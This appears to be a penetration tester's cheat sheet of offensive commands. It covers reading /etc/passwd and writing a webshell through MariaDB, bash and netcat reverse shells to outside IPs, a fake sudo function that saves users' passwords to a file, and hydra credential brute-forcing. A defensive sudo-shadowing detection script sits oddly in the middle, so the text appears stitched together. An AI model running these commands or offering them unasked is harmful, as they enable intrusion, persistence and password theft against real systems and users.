Useful things
General
When we have enough privileges in MariaDB, we can use the load_file() function to read files that we are interested in. Example:
select load_file("/etc/passwd");
We can use SELECT ... INTO OUTFILE to write a file. Example:
select "<?php phpinfo() ?>" into outfile "/var/www/html/shell.php";
We can put a webshell in place of phpinfo().
Simple Bash Shell:
bash -i >& /dev/tcp/1.2.3.4/4321 0>&1
Netcat Shell:
nc 192.168.6.1 1234 -e /bin/bash
To steal the sudo password:
function sudo () {
realsudo="$(which sudo)"
read -s -p "[sudo] password for $USER: " inputPasswd
printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt
$realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1
$realsudo "${@:1}"
}
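A defensive counterpart to the wrapper above, as an added example that is not part of the original notes: it scans shell startup files for a function or alias named sudo and reports how the current shell resolves the command. The function names, the regular expression and the sample file are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original page): find shell startup files that
# redefine `sudo` as a function or alias, which is what the wrapper above relies on.

# Matches "function sudo", "sudo()" / "sudo ()", and "alias sudo=" at line start.
SUDO_SHADOW_RE='^[[:space:]]*(function[[:space:]]+sudo([[:space:]]|\(|\{|$)|sudo[[:space:]]*\(\)|alias[[:space:]]+sudo=)'

# scan_rc_files FILE...
# Prints file:line:text for every definition found; returns 0 if any was found.
scan_rc_files() {
    _found=1
    for _f in "$@"; do
        [ -r "$_f" ] || continue
        # /dev/null as a second operand forces grep to print the file name.
        if grep -nE "$SUDO_SHADOW_RE" "$_f" /dev/null; then
            _found=0
        fi
    done
    return "$_found"
}

# sudo_resolution
# Reports how the *current* shell resolves `sudo`: a path means the real binary,
# anything else (a bare name or an alias definition) means it is shadowed.
sudo_resolution() {
    _r=$(command -v sudo 2>/dev/null) || { echo "missing"; return 0; }
    case "$_r" in
        /*) echo "binary:$_r" ;;
        *)  echo "shadowed:$_r" ;;
    esac
}

# Constructed sample rc file (not from a real system) to show the output format.
_sample=$(mktemp)
cat >"$_sample" <<'EOF'
alias ll='ls -l'
function sudo () {
    command sudo "$@"
}
EOF
scan_rc_files "$_sample" || echo "no sudo shadowing found"
rm -f "$_sample"
```

Point scan_rc_files at ~/.bashrc, ~/.bash_profile, ~/.profile and /etc/profile.d/*.sh. Call sudo_resolution after sourcing the file in an interactive session, since a non-interactive script does not load those startup files.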
Cron time string
30 * * * *
Execute a command at 30 minutes past the hour, every hour.
0 13 * * 1
Execute a command at 1:00 p.m. UTC every Monday.
*/5 * * * *
Execute a command every five minutes.
0 */2 * * *
Execute a command every second hour, on the hour.
hydra
When we have a wordlist like:
admin:admin
admin:password
...
we have to use the -C option in hydra. Example:
hydra -C wordlist.txt ftp://<vuln_ip>